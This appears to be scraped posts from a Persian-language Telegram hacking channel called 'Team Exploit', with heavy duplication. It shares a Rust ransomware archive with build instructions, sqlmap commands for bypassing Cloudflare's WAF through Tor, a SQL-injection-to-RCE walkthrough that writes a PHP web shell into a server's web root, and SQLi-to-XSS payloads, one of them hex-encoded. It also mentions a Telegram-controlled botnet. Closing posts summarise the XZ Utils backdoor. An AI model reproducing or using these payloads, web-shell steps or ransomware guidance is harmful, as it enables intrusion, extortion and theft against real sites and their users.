Team Exploit
Photo
یدونه خودم دارم میزنم تا الان خیلی جیگر شده
احتمالا چند روز دیگه میاد و قیمت این از بات نت متصل به ربات تلگرامم بیشتره!
احتمالا چند روز دیگه میاد و قیمت این از بات نت متصل به ربات تلگرامم بیشتره!
ransomware.rar
6.6 KB
یه باج افزار گوگولی و زیبا نوشته شده با راست
اول از همه وارد دایرکتوریش بشید و پیشنیاز هارو نصب کنید
cargo build
فایل constants.rs رو هم ادیت کنید
و بعد کامپایل کنید؛
Pass:
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
اول از همه وارد دایرکتوریش بشید و پیشنیاز هارو نصب کنید
cargo build
فایل constants.rs رو هم ادیت کنید
و بعد کامپایل کنید؛
Pass:
@esfelurm
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نحوه بای پس WAF با sqlmap
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
sudo apt install privoxy -yدر نهایت حمله را شروع کنید!
sudo /etc/init.d/privoxy start
python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor#Sqlmap
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
نحوه رسیدن اسیب پذیری Sqli به Rce
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
127.0.0.1/rce.php?cmd=time
با خروجی زیر:
1 The current time is: 16:22:25.20 Enter the new time: 3 4
حالا وب شل را از طریق sqli آپلود کنید
++++++++++++++++++++++++
ترجمه و جمع اوری شده از سایت SQLI -> RCE
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
union select 1,@@datadir,3,4 --و خروجی به صورت زیر خواهد بود:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:
<host>/rce.php?cmd=<command>ماله من روی سرور محلی است پس:
127.0.0.1/rce.php?cmd=time
با خروجی زیر:
1 The current time is: 16:22:25.20 Enter the new time: 3 4
حالا وب شل را از طریق sqli آپلود کنید
++++++++++++++++++++++++
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
اسیب پذیری SiXSS یا Sqli to Xss
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
تزریق پیلود ما:
جمع اوری و ترجمه شده از سایت Sqli to Xss
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
' ;<img src=x onerror=prompt(/XSS/)>تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:
http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :
<img src=x onerror=confirm(/XSS/)>مقدار کدگذاری شده Hex :
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیرهای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم .
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
در 29 مارس 2024، یک بکدور در یک بسته محبوب به نام XZ Utils در لیست پستی Openwall اعلام شد . این ابزار شامل کتابخانه ای به نام liblzma است که توسط SSHD، بخش مهمی از زیرساخت اینترنت مورد استفاده برای دسترسی از راه دور استفاده می شود. وقتی بارگذاری میشود، CVE-2024-3094 بر احراز هویت SSHD تأثیر میگذارد که به طور بالقوه اجازه دسترسی مزاحمان را بدون توجه به روش میدهد.
نسخه های تحت تأثیر: 5.6.0، 5.6.1
توزیع های تحت تأثیر: فدورا 41، فدورا راوید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نسخه های تحت تأثیر: 5.6.0، 5.6.1
توزیع های تحت تأثیر: فدورا 41، فدورا راوید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
در 29 مارس 2024، یک بکدور در یک بسته محبوب به نام XZ Utils در لیست پستی Openwall اعلام شد . این ابزار شامل کتابخانه ای به نام liblzma است که توسط SSHD، بخش مهمی از زیرساخت اینترنت مورد استفاده برای دسترسی از راه دور استفاده می شود. وقتی بارگذاری میشود، CVE…
یک مهندس نرم افزار در مایکروسافت در حال کار برروی نسخه ناپایدار و ادج توزیع دبیان بوده است که به اصطلاح به این نسخهها ، نسخه های Testing میگویند. این مهندس نرم افزار بصورت اتفاقی متوجه میشود که هنگام برقراری اتصال به سرویس SSH تغییراتی در میزان لود CPU و تاخیر زمانی 500 میلی ثانیه اتفاق میفتد.این تغییرات اونقدر کوچک هستند که کمتر کسی میتواند به این موضوع مشکوک شود و تقریبا همه افراد اینچنین موضوعات را به پای اختلالات اینترنتی و شبکه و ... میگذارند اما این مهندس نرم افزار شرکت مایکروسافت موضوع را پیگیری کرده و متوجه میشود یک بکدور در کتابخانه liblzma بسته نرم افزاری xz-utils وجود دارد. این مهندس نرم افزار باتوجه به احتمالاتی که میدهد اقدام به بررسی اجزای مختلف تشکیل دهنده سرویس SSH میکند و همچنین توزیع دبیان Testing را نیز مورد بررسی قرار میدهد چرا که این مشکل میتوانست از منشا خوده توزیع دبیان و یا کرنل لینوکس قرار گرفته برروی آن باشد.در نهایت با مقایسه بسته های نرم افزاری اجزای تشکیل دهنده سرویس SSH در نسخه Testing و Stable دبیان متوجه میشوند که کتابخانه liblzma در بسته نرم افزاری xz-utils دارای درب پشتی است. همچنین قابل ذکر است نسخه های جدید بسته نرم افزاری xz-utils که در واقع نسخه های 5.6.0 و 5.6.1 هستند این مشکل را دارند و بدلیل اینکه این نسخه ها هنوز وارد مخازن نسخه های Stable دبیان نشده بودند خوشبختانه فقط نسخه های Testing آلوده شده بودند. همچنین میتوان نتیجه گرفت این مشکل به توزیع دبیان مربوط نمیشود بلکه تمامی توزیع های لینوکسی که از بسته نرم افزاری xz-utils نسخه های 5.6.0 و 5.6.1 استفاده میکردند دارای این درب پشتی هستند که لیست آن توزیع ها را میتوانید در عکس پایین مشاهده کنید: